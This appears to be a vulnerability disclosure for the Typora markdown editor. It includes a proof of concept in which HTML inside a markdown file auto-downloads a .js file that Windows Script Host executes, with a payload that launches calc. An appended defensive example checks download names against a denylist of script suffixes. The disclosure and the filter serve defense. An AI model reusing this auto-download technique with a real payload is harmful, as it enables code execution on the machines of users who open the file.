Although Typora filters most dangerous suffixes, it still retains the .js file, which will be recognized as WSH (Windows Script Host) JScript on the Windows operating system. Users clicking on an evil markdown file may cause code execution.
```html
<!-- auto download !-->
<html>
<script>
var blob = new Blob(['var WshShell = new ActiveXObject("WScript.Shell");var ret = WshShell.run("calc");if (ret == 0)WScript.Echo("You were hacked.");WScript.Quit();'], {type: 'application/js'});
var a = document.createElement('a');
a.href = window.URL.createObjectURL(blob);
a.download = 'poc.js';
a.click();
</script>
</html>

<!-- click to download !-->
<a href="http://127.0.0.1:8000/poc.js" download="poc.js">CLICK~~</a>
```
poc.js
```js
var WshShell = new ActiveXObject("WScript.Shell");
var ret = WshShell.run("calc");
if (ret == 0) WScript.Echo("You were hacked.");
WScript.Quit();
```
If you set WSH as the default application for .js files, then when you click poc.js in File Explorer, the script will also be executed. Actually, users should not set WSH as the default application for .js files.
Version: 0.9.78-1.5.5 (latest)
Attachment
poc.md
poc.html
poc.js
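One way to check the file name a link would be saved under against a suffix denylist that includes `.js`, as an added example (not Typora's code and not part of the original report). The suffix list, the function names, the placeholder base URL and the sample links are assumptions made for illustration.

```javascript
// Added example. Suffixes that Windows passes to Windows Script Host or another
// interpreter on open. The list is an assumption, not Typora's real filter.
const BLOCKED_SUFFIXES = new Set([
  'js', 'jse', 'vbs', 'vbe', 'wsf', 'wsh', 'hta',
  'bat', 'cmd', 'ps1', 'exe', 'com', 'scr', 'msi', 'lnk',
]);

// Every file name the link could be saved under: the `download` attribute
// (used by both PoC links) and the last path segment of the URL itself.
function candidateNames(href, downloadAttr) {
  const names = [];
  if (downloadAttr) names.push(downloadAttr);
  let path = href;
  try {
    // Placeholder base so relative links parse; query and fragment are dropped.
    path = new URL(href, 'http://placeholder.invalid/').pathname;
  } catch (e) { /* unparsable href: fall back to the raw string */ }
  let last = path.split(/[\\/]/).pop();
  try { last = decodeURIComponent(last); } catch (e) { /* keep undecoded */ }
  if (last) names.push(last);
  return names;
}

// Windows drops trailing dots and spaces when it creates the file, so
// "poc.js." and "POC.JS " both land on disk as a .js file.
function effectiveSuffix(name) {
  const base = name.split(/[\\/]/).pop().replace(/[. ]+$/, '');
  const dot = base.lastIndexOf('.');
  return dot === -1 ? '' : base.slice(dot + 1).toLowerCase();
}

function isBlockedLink(href, downloadAttr) {
  return candidateNames(href, downloadAttr)
    .some((name) => BLOCKED_SUFFIXES.has(effectiveSuffix(name)));
}

// Constructed sample links; the first two mirror the PoC's two download paths.
const SAMPLE_LINKS = [
  ['blob:http://127.0.0.1:8000/0000-constructed', 'poc.js'],
  ['http://127.0.0.1:8000/poc.js', 'poc.js'],
  ['http://127.0.0.1:8000/notes.txt', 'POC.JS.'],
  ['http://127.0.0.1:8000/poc%2Ejs?v=1', undefined],
  ['http://127.0.0.1:8000/readme.md', undefined],
];
for (const [href, download] of SAMPLE_LINKS) {
  console.log(isBlockedLink(href, download) ? 'BLOCK' : 'allow', href, download || '');
}
```

The check covers both the `download` attribute and the URL path because either one can determine the saved name.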